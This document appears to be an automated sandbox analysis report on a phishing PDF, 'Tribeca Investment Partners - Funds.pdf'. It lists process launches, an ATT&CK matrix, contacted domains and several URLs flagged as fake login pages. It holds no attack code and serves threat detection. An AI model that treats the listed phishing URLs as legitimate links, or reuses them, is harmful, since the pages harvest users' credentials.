      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' https://spark.adobe.com/page/GG8mUEsjQvSUh/Jump to behavior
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe 'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe' --type=renderer --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --touch-events=enabled --field-trial-handle=1696,14583101347345561594,418495030725437647,131072 --disable-features=VizDisplayCompositor --disable-gpu-compositing --service-pipe-token=18176514141952179124 --lang=en-US --disable-pack-loading --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --log-severity=disable --product-version='ReaderServices/19.12.20035 Chrome/80.0.0.0' --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=18176514141952179124 --renderer-client-id=2 --mojo-platform-channel-handle=1664 --allow-no-sandbox-job /prefetch:1Jump to behavior
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe 'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe' --type=gpu-process --field-trial-handle=1696,14583101347345561594,418495030725437647,131072 --disable-features=VizDisplayCompositor --disable-pack-loading --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --log-severity=disable --product-version='ReaderServices/19.12.20035 Chrome/80.0.0.0' --lang=en-US --gpu-preferences=KAAAAAAAAACAAwABAQAAAAAAAAAAAGAAAAAAAAEAAAAIAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAFAAAAEAAAAAAAAAAAAAAABgAAABAAAAAAAAAAAQAAAAUAAAAQAAAAAAAAAAEAAAAGAAAA --use-gl=swiftshader-webgl --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --service-request-channel-token=14323790637429607960 --mojo-platform-channel-handle=1780 --allow-no-sandbox-job --ignored=' --type=renderer ' /prefetch:2Jump to behavior
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe 'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe' --type=renderer --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --touch-events=enabled --field-trial-handle=1696,14583101347345561594,418495030725437647,131072 --disable-features=VizDisplayCompositor --disable-gpu-compositing --service-pipe-token=15500690304138507742 --lang=en-US --disable-pack-loading --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --log-severity=disable --product-version='ReaderServices/19.12.20035 Chrome/80.0.0.0' --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=15500690304138507742 --renderer-client-id=4 --mojo-platform-channel-handle=1868 --allow-no-sandbox-job /prefetch:1Jump to behavior
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe 'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe' --type=renderer --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --touch-events=enabled --field-trial-handle=1696,14583101347345561594,418495030725437647,131072 --disable-features=VizDisplayCompositor --disable-gpu-compositing --service-pipe-token=4408287619177528861 --lang=en-US --disable-pack-loading --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --log-severity=disable --product-version='ReaderServices/19.12.20035 Chrome/80.0.0.0' --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=4408287619177528861 --renderer-client-id=5 --mojo-platform-channel-handle=1872 --allow-no-sandbox-job /prefetch:1Jump to behavior
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe 'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe' --type=renderer --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --touch-events=enabled --field-trial-handle=1696,14583101347345561594,418495030725437647,131072 --disable-features=VizDisplayCompositor --disable-gpu-compositing --service-pipe-token=4271642722203936314 --lang=en-US --disable-pack-loading --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --log-severity=disable --product-version='ReaderServices/19.12.20035 Chrome/80.0.0.0' --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=4271642722203936314 --renderer-client-id=6 --mojo-platform-channel-handle=2204 --allow-no-sandbox-job /prefetch:1Jump to behavior
      Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1968 CREDAT:17410 /prefetch:2Jump to behavior
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeFile opened: C:\Windows\SysWOW64\Msftedit.dllJump to behavior
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeFile opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dllJump to behavior
      Source: Tribeca Investment Partners - Funds.pdfInitial sample: PDF keyword /JS count = 0
      Source: Tribeca Investment Partners - Funds.pdfInitial sample: PDF keyword /JavaScript count = 0
      Source: Tribeca Investment Partners - Funds.pdfInitial sample: PDF keyword /EmbeddedFile count = 0
      Source: Tribeca Investment Partners - Funds.pdfInitial sample: PDF keyword obj count = 124
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: Contact_72px_lt-gray[1].svg.24.drBinary or memory string: NEIBESjjzwKWaQEmuhbGgACFWDKdB5OZZSX+agjjkcZegD1y0h+ELA7oCf9h2TzH5Lk87RNpJWUz
      Source: AcroRd32.exe, 00000002.00000002.387053876.000000000D211000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllm
      Source: LawEnforcement_72px_lt-gray[1].svg.24.drBinary or memory string: 4RfwbOThACGyTEZ5moRPrV2QweL6BvvMQAZIZXEdT2O5NEPgUsRJGSwFUuYlgyhgfSp3NY2hgKUv
      Source: Policies_72px_lt-gray[1].svg.24.drBinary or memory string: 4tB1EVplopO2rztHQjrQqeMUbUqdlUYbWkVkAS0rzSFGk5qfcFFaK8X2oKw7N1FayNdH7BQ+Tst9
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeCode function: 2_2_04F1D1D0 LdrInitializeThunk,2_2_04F1D1D0
      Source: AcroRd32.exe, 00000002.00000002.365683252.0000000005860000.00000002.00000001.sdmpBinary or memory string: Program Manager
      Source: AcroRd32.exe, 00000002.00000002.365683252.0000000005860000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
      Source: AcroRd32.exe, 00000002.00000002.365683252.0000000005860000.00000002.00000001.sdmpBinary or memory string: Progman
      Source: AcroRd32.exe, 00000002.00000002.365683252.0000000005860000.00000002.00000001.sdmpBinary or memory string: Progmanlock

      Mitre Att&ck Matrix

      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Spearphishing Link1Windows Management InstrumentationPath InterceptionProcess Injection2Masquerading1OS Credential DumpingSecurity Software Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumEncrypted Channel2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
      Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsProcess Injection2LSASS MemoryProcess Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Application Layer Protocol1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerFile and Directory Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationApplication Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 433116 Sample: Tribeca Investment Partners... Startdate: 11/06/2021 Architecture: WINDOWS Score: 64 39 page.adobespark-assets.com 2->39 43 Found potential malicious PDF (bad image similarity) 2->43 45 Antivirus detection for URL or domain 2->45 47 Yara detected HtmlPhish29 2->47 8 AcroRd32.exe 16 43 2->8         started        signatures3 process4 process5 10 iexplore.exe 2 67 8->10         started        12 RdrCEF.exe 74 8->12         started        15 AcroRd32.exe 10 7 8->15         started        dnsIp6 17 iexplore.exe 324 10->17         started        41 192.168.2.1 unknown unknown 12->41 21 RdrCEF.exe 12->21         started        23 RdrCEF.exe 12->23         started        25 RdrCEF.exe 12->25         started        27 2 other processes 12->27 process7 dnsIp8 31 xinviaoafinabatizx.us-south.cf.appdomain.cloud 169.47.124.25, 443, 49758, 49759 SOFTLAYERUS United States 17->31 33 rikapcndbn.web.app 151.101.1.195, 443, 49763, 49764 FASTLYUS United States 17->33 37 19 other IPs or domains 17->37 29 C:\Users\user\...behaviorgraphG8mUEsjQvSUh[1].htm, HTML 17->29 dropped 35 80.0.0.0 NTLGB United Kingdom 21->35 file9

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      Tribeca Investment Partners - Funds.pdf0%ReversingLabs

      Dropped Files

      No Antivirus matches

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      https://spark.adobe.com/page/GG8mUEsjQvSUh/?page-mode=static100%SlashNextFake Login Page type: Phishing & Social Engineering
      https://xinviaoafinabatizx.us-south.cf.appdomain.cloud/?bbre=zoxsazx100%SlashNextFake Login Page type: Phishing & Social Engineering
      https://spark.adobe.com/page/GG8mUEsjQvSUh/100%SlashNextFake Login Page type: Phishing & Social Engineering
      https://PrefSyncJob/com.adobe.acrobat.ADotCom/Resource/Sync/TY0%Avira URL Cloudsafe
      https://page.adobespark-assets.com/runtime/1.22/typekit-load.gz.js0%URL Reputationsafe
      https://page.adobespark-assets.com/runtime/1.22/typekit-load.gz.js0%URL Reputationsafe
      https://page.adobespark-assets.com/runtime/1.22/typekit-load.gz.js0%URL Reputationsafe
      http://www.osmf.org/drm/default0%URL Reputationsafe
      http://www.osmf.org/drm/default0%URL Reputationsafe
      http://www.osmf.org/drm/default0%URL Reputationsafe
      https://openjsf.org/0%URL Reputationsafe
      https://openjsf.org/0%URL Reputationsafe
      https://openjsf.org/0%URL Reputationsafe
      https://ade0164.d41.co/sync/0%URL Reputationsafe
      https://ade0164.d41.co/sync/0%URL Reputationsafe
      https://ade0164.d41.co/sync/0%URL Reputationsafe
      http://iptc.org/std/Iptc4xmpCore/1.0/xmlns/0%URL Reputationsafe
      http://iptc.org/std/Iptc4xmpCore/1.0/xmlns/0%URL Reputationsafe
      http://iptc.org/std/Iptc4xmpCore/1.0/xmlns/0%URL Reputationsafe
      http://cipa.jp/exif/1.0/(15)0%URL Reputationsafe
      http://cipa.jp/exif/1.0/(15)0%URL Reputationsafe
      http://cipa.jp/exif/1.0/(15)0%URL Reputationsafe
      http://cipa.jp/exif/1.0/0%URL Reputationsafe
      http://cipa.jp/exif/1.0/0%URL Reputationsafe
      http://cipa.jp/exif/1.0/0%URL Reputationsafe
      http://www.osmf.org/default/1.0%http://www.osmf.org/mediatype/default0%URL Reputationsafe
      http://www.osmf.org/default/1.0%http://www.osmf.org/mediatype/default0%URL Reputationsafe
      http://www.osmf.org/default/1.0%http://www.osmf.org/mediatype/default0%URL Reputationsafe
      https://www.adobebe.com/page/GG8mUEsjQvSUh/0%Avira URL Cloudsafe
      https://PrefSyncJob/com.adobe.acrobat.ADotCom/Resource/Sync/yY0%Avira URL Cloudsafe
      https://page.adobespark-assets.com/runtime/1.22/images/favicon.ico0%URL Reputationsafe
      https://page.adobespark-assets.com/runtime/1.22/images/favicon.ico0%URL Reputationsafe
      https://page.adobespark-assets.com/runtime/1.22/images/favicon.ico0%URL Reputationsafe
      http://www.iport.it)0%Avira URL Cloudsafe
      https://PrefSyncJob/com.adobe.acrobat.ADotCom/Resource/Sync/Upload/0%Avira URL Cloudsafe
      https://page.adobespark-assets.com/runtime/1.22/runtime-prod.gz.js0%URL Reputationsafe
      https://page.adobespark-assets.com/runtime/1.22/runtime-prod.gz.js0%URL Reputationsafe
      https://page.adobespark-assets.com/runtime/1.22/runtime-prod.gz.js0%URL Reputationsafe
      http://iptc.org/std/Iptc4xmpCore/1.0/xmlns/v0%Avira URL Cloudsafe
      http://iptc.org/std/Iptc4xmpExt/2008-02-29/0%URL Reputationsafe
      http://iptc.org/std/Iptc4xmpExt/2008-02-29/0%URL Reputationsafe
      http://iptc.org/std/Iptc4xmpExt/2008-02-29/0%URL Reputationsafe
      http://medialize.github.io/URI.js/0%Avira URL Cloudsafe
      http://www.osmf.org/layout/padding%http://www.osmf.org/layout/attributes0%URL Reputationsafe
      http://www.osmf.org/layout/padding%http://www.osmf.org/layout/attributes0%URL Reputationsafe
      http://www.osmf.org/layout/padding%http://www.osmf.org/layout/attributes0%URL Reputationsafe
      https://PrefSyncJob/com.adobe.acrobat.ADotCom/Resource/Sync/y0%Avira URL Cloudsafe
      http://www.quicktime.com.Acrobat0%URL Reputationsafe
      http://www.quicktime.com.Acrobat0%URL Reputationsafe
      http://www.quicktime.com.Acrobat0%URL Reputationsafe
      https://PrefSyncJob/com.adobe.acrobat.ADotCom/Resource/Sync/Upload/40%Avira URL Cloudsafe
      https://page.adobespark-assets.com/runtime/1.22/noscript.gz.css0%URL Reputationsafe
      https://page.adobespark-assets.com/runtime/1.22/noscript.gz.css0%URL Reputationsafe
      https://page.adobespark-assets.com/runtime/1.22/noscript.gz.css0%URL Reputationsafe

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      dd20fzx9mj46f.cloudfront.net
      13.224.187.69
      truefalse
        high
        dcs-edge-irl1-876252164.eu-west-1.elb.amazonaws.com
        63.33.31.50
        truefalse
          high
          rikapcndbn.web.app
          151.101.1.195
          truefalse
            unknown
            xinviaoafinabatizx.us-south.cf.appdomain.cloud
            169.47.124.25
            truefalse
              unknown
              kifot.wancdnapp.page
              172.67.145.59
              truefalse
                unknown
                spark.adobeprojectm.com
                13.225.74.22
                truefalse
                  unknown
                  s3.amazonaws.com
                  52.216.105.77
                  truefalse
                    high
                    adobe.com.ssl.d1.sc.omtrdc.net
                    15.236.176.210
                    truefalse
                      unknown
                      api.demandbase.com
                      13.225.74.37
                      truefalse
                        high
                        unpkg.com
                        104.16.123.175
                        truefalse
                          high
                          page.adobespark-assets.com
                          13.224.195.109
                          truefalse
                            unknown
                            cdn.cookielaw.org
                            104.16.148.64
                            truefalse
                              high
                              geolocation.onetrust.com
                              104.20.184.68
                              truefalse
                                high
                                use.typekit.net
                                unknown
                                unknownfalse
                                  high
                                  assets.adobedtm.com
                                  unknown
                                  unknownfalse
                                    high
                                    p.typekit.net
                                    unknown
                                    unknownfalse
                                      high
                                      dpm.demdex.net
                                      unknown
                                      unknownfalse
                                        high
                                        static.adobelogin.com
                                        unknown
                                        unknownfalse
                                          high

                                          URLs from Memory and Binaries

                                          NameSourceMaliciousAntivirus DetectionReputation
                                          https://PrefSyncJob/com.adobe.acrobat.ADotCom/Resource/Sync/TYAcroRd32.exe, 00000002.00000002.387053876.000000000D211000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          low
                                          https://www.linkedin.comscripts[1].js0.24.drfalse
                                            high
                                            https://assets.adobedtm.com/d4d114c60e50/f3fbfbe0e7ca/f496fb7b47d7/RC881683c91a4d4caaa3e05264c5d9624RC881683c91a4d4caaa3e05264c5d96242-file.min[1].js.24.drfalse
                                              high
                                              https://page.adobespark-assets.com/runtime/1.22/typekit-load.gz.jsGG8mUEsjQvSUh[1].htm0.24.drfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              https://assets.adobedtm.comlogin[2].htm.24.drfalse
                                                high
                                                https://www.youtube.comscripts[1].js0.24.drfalse
                                                  high
                                                  https://static.adobelogin.com/imslib/imslib.min.jsprivacy[1].htm0.24.drfalse
                                                    high
                                                    https://www.instagram.comscripts[1].js0.24.drfalse
                                                      high
                                                      https://use.typekit.net/af/c8f445/00000000000000003b9aee47/27/d?primer=388f68b35a7cbf1ee3543172445c2pps7abe[1].css.24.drfalse
                                                        high
                                                        https://use.typekit.net/af/8f4e31/0000000000000000000132e3/27/vtg4qoo[1].js0.24.drfalse
                                                          high
                                                          http://www.osmf.org/drm/defaultAcroRd32.exe, 00000002.00000002.366941342.0000000007B70000.00000002.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          unknown
                                                          https://use.typekit.net/af/e09494/00000000000000003b9aee45/27/l?primer=388f68b35a7cbf1ee3543172445c2pps7abe[1].css.24.drfalse
                                                            high
                                                            https://use.typekit.net/af/b0c5f5/00000000000000003b9b3f85/27/d?primer=388f68b35a7cbf1ee3543172445c2pps7abe[1].css.24.drfalse
                                                              high
                                                              https://openjsf.org/marvelcommon-51100480[1].js.24.drfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://use.typekit.net/af/3d913c/000000000000000000017709/26/rbi5aua[1].js1.24.drfalse
                                                                high
                                                                https://ade0164.d41.co/sync/RC881683c91a4d4caaa3e05264c5d96242-file.min[1].js.24.drfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                https://adobespark.uservoice.comunsupported[1].htm.24.drfalse
                                                                  high
                                                                  https://developer.akamai.com/tools/boomerang#mpulse-session-informationen[1].js.24.drfalse
                                                                    high
                                                                    https://use.typekit.net/af/c8f445/00000000000000003b9aee47/27/a?primer=388f68b35a7cbf1ee3543172445c2pps7abe[1].css.24.drfalse
                                                                      high
                                                                      https://use.typekit.net/af/e09494/00000000000000003b9aee45/27/a?primer=388f68b35a7cbf1ee3543172445c2pps7abe[1].css.24.drfalse
                                                                        high
                                                                        http://iptc.org/std/Iptc4xmpCore/1.0/xmlns/AcroRd32.exe, 00000002.00000002.384245575.000000000B4DA000.00000004.00000001.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        https://use.typekit.net/af/edcf1e/0000000000000000000158d9/26/rbi5aua[1].js1.24.drfalse
                                                                          high
                                                                          http://cipa.jp/exif/1.0/(15)AcroRd32.exe, 00000002.00000002.373908461.0000000009350000.00000004.00000001.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          unknown
                                                                          https://use.typekit.net/af/37eaae/00000000000000003b9b3f83/27/d?primer=388f68b35a7cbf1ee3543172445c2pps7abe[1].css.24.drfalse
                                                                            high
                                                                            https://github.com/kriskowal/q/blob/v1/LICENSEmarvelcommon-51100480[1].js.24.drfalse
                                                                              high
                                                                              http://underscorejs.org/LICENSEmarvelcommon-51100480[1].js.24.drfalse
                                                                                high
                                                                                https://assets.adobedtm.com/d4d114c60e50/f3fbfbe0e7ca/f496fb7b47d7/RC89c6d3bd15f043db95a5a0a4b5cc9daRC89c6d3bd15f043db95a5a0a4b5cc9da0-file.min[1].js.24.drfalse
                                                                                  high
                                                                                  https://adobespark.zendesk.com/hc/en-us/articles/219243657en-US_bundle-6a358124[1].js.24.drfalse
                                                                                    high
                                                                                    https://ims-na1.adobelogin.comAcroRd32.exe, 00000002.00000002.373908461.0000000009350000.00000004.00000001.sdmpfalse
                                                                                      high
                                                                                      https://use.typekit.net/vtg4qoo.csslogin[2].htm.24.drfalse
                                                                                        high
                                                                                        https://adobesparkpost.app.link/nfQW2NoCVebexpress[1].htm.24.drfalse
                                                                                          high
                                                                                          https://use.typekit.net/af/9951d2/0000000000000000000158d7/26/rbi5aua[1].js1.24.drfalse
                                                                                            high
                                                                                            https://adobespark.zendesk.com/hc/en-us/articles/218956027en-US_bundle-6a358124[1].js.24.drfalse
                                                                                              high
                                                                                              https://npms.io/search?q=ponyfill.marvelcommon-51100480[1].js.24.drfalse
                                                                                                high
                                                                                                https://assets.adobedtm.com/d4d114c60e50/f3fbfbe0e7ca/f496fb7b47d7/RC5e5d1b9fe0a942c38190dc219952994RC5e5d1b9fe0a942c38190dc2199529941-file.min[1].js.24.drfalse
                                                                                                  high
                                                                                                  https://use.typekit.net/af/b0c5f5/00000000000000003b9b3f85/27/l?primer=7cdcb44be4a7db8877ffa5c0007b8scripts[1].js0.24.drfalse
                                                                                                    high
                                                                                                    https://use.typekit.net/af/9d1933/00000000000000000001705b/26/rbi5aua[1].js1.24.drfalse
                                                                                                      high
                                                                                                      https://cdn.cookielaw.orglogin[2].htm.24.drfalse
                                                                                                        high
                                                                                                        http://www.aiim.org/pdfa/ns/schema#AcroRd32.exe, 00000002.00000002.384245575.000000000B4DA000.00000004.00000001.sdmpfalse
                                                                                                          high
                                                                                                          http://cipa.jp/exif/1.0/AcroRd32.exe, 00000002.00000002.373908461.0000000009350000.00000004.00000001.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          • URL Reputation: safe
                                                                                                          • URL Reputation: safe
                                                                                                          unknown
                                                                                                          http://www.osmf.org/default/1.0%http://www.osmf.org/mediatype/defaultAcroRd32.exe, 00000002.00000002.366941342.0000000007B70000.00000002.00000001.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          • URL Reputation: safe
                                                                                                          • URL Reputation: safe
                                                                                                          unknown
                                                                                                          https://www.adobebe.com/page/GG8mUEsjQvSUh/{135EBDC5-CADC-11EB-90E4-ECF4BB862DED}.dat.23.drfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          unknown
                                                                                                          https://use.typekit.net/af/97fbd1/00000000000000003b9b3f88/27/l?primer=7cdcb44be4a7db8877ffa5c0007b8scripts[1].js0.24.drfalse
                                                                                                            high
                                                                                                            https://PrefSyncJob/com.adobe.acrobat.ADotCom/Resource/Sync/yYAcroRd32.exe, 00000002.00000002.387053876.000000000D211000.00000004.00000001.sdmpfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            low
                                                                                                            https://page.adobespark-assets.com/runtime/1.22/images/favicon.icoGG8mUEsjQvSUh[1].htm0.24.dr, imagestore.dat.24.dr, ~DF8227BB7BB94304CB.TMP.23.drfalse
                                                                                                            • URL Reputation: safe
                                                                                                            • URL Reputation: safe
                                                                                                            • URL Reputation: safe
                                                                                                            unknown
                                                                                                            http://www.iport.it)chrome[1].js.24.drfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            low
                                                                                                            http://www.opensource.org/licenses/mit-license.htmlmarvelcommon-51100480[1].js.24.drfalse
                                                                                                              high
                                                                                                              https://cdn.cookielaw.org/vendorlist/googleData.json7a5eb705-95ed-4cc4-a11d-0cc5760e93db[1].js.24.drfalse
                                                                                                                high
                                                                                                                https://use.typekit.net/af/180c9d/00000000000000003b9b3f8a/27/onz5gap[1].js0.24.drfalse
                                                                                                                  high
                                                                                                                  http://www.opensource.org/licenses/mit-licensem-unsupported-88cd3215[1].js.24.drfalse
                                                                                                                    high
                                                                                                                    http://typekit.com/eulas/00000000000000003b9b3f8aonz5gap[1].js0.24.drfalse
                                                                                                                      high
                                                                                                                      http://typekit.com/eulas/00000000000000003b9b3f8cpps7abe[1].css.24.drfalse
                                                                                                                        high
                                                                                                                        http://typekit.com/eulas/0000000000000000000176ffvtg4qoo[1].js0.24.drfalse
                                                                                                                          high
                                                                                                                          https://PrefSyncJob/com.adobe.acrobat.ADotCom/Resource/Sync/Upload/AcroRd32.exe, 00000002.00000002.384922126.000000000B633000.00000004.00000001.sdmpfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          low
                                                                                                                          https://adobesparkpost.app.link/jsoIbkwCVebexpress[1].htm.24.drfalse
                                                                                                                            high
                                                                                                                            https://cdn.cookielaw.org/vendorlist/iab2Data.json7a5eb705-95ed-4cc4-a11d-0cc5760e93db[1].js.24.drfalse
                                                                                                                              high
                                                                                                                              https://use.typekit.net/af/74fc30/0000000000000000000158d4/26/rbi5aua[1].js1.24.drfalse
                                                                                                                                high
                                                                                                                                https://page.adobespark-assets.com/runtime/1.22/runtime-prod.gz.jsGG8mUEsjQvSUh[1].htm0.24.drfalse
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                unknown
                                                                                                                                http://www.aiim.org/pdfa/ns/extension/AcroRd32.exe, 00000002.00000002.384245575.000000000B4DA000.00000004.00000001.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://use.typekit.net/af/c8f445/00000000000000003b9aee47/27/l?primer=388f68b35a7cbf1ee3543172445c2pps7abe[1].css.24.drfalse
                                                                                                                                    high
                                                                                                                                    http://iptc.org/std/Iptc4xmpCore/1.0/xmlns/vAcroRd32.exe, 00000002.00000002.384245575.000000000B4DA000.00000004.00000001.sdmpfalse
                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                    unknown
                                                                                                                                    https://use.typekit.net/af/d5d9b2/00000000000000000000ffd9/26/rbi5aua[1].js1.24.drfalse
                                                                                                                                      high
                                                                                                                                      https://twitter.com/AdobeSparkunsupported[1].htm.24.drfalse
                                                                                                                                        high
                                                                                                                                        https://use.typekit.net/af/ad2a79/00000000000000003b9b3f8c/27/l?primer=388f68b35a7cbf1ee3543172445c2pps7abe[1].css.24.drfalse
                                                                                                                                          high
                                                                                                                                          http://iptc.org/std/Iptc4xmpExt/2008-02-29/AcroRd32.exe, 00000002.00000002.384245575.000000000B4DA000.00000004.00000001.sdmpfalse
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          unknown
                                                                                                                                          https://use.typekit.net/af/eaf09c/000000000000000000017703/27/vtg4qoo[1].js0.24.drfalse
                                                                                                                                            high
                                                                                                                                            https://reactjs.org/docs/error-decoder.html?invariant=publish.combined.fp-67aad4c89568b23c662905b8b4fd16bd[1].js.24.drfalse
                                                                                                                                              high
                                                                                                                                              https://adobesparkpost.app.link/g8sk4xb8AVlogo[1].htm.24.drfalse
                                                                                                                                                high
                                                                                                                                                http://typekit.com/eulas/0000000000000000000158d4rbi5aua[1].js1.24.drfalse
                                                                                                                                                  high
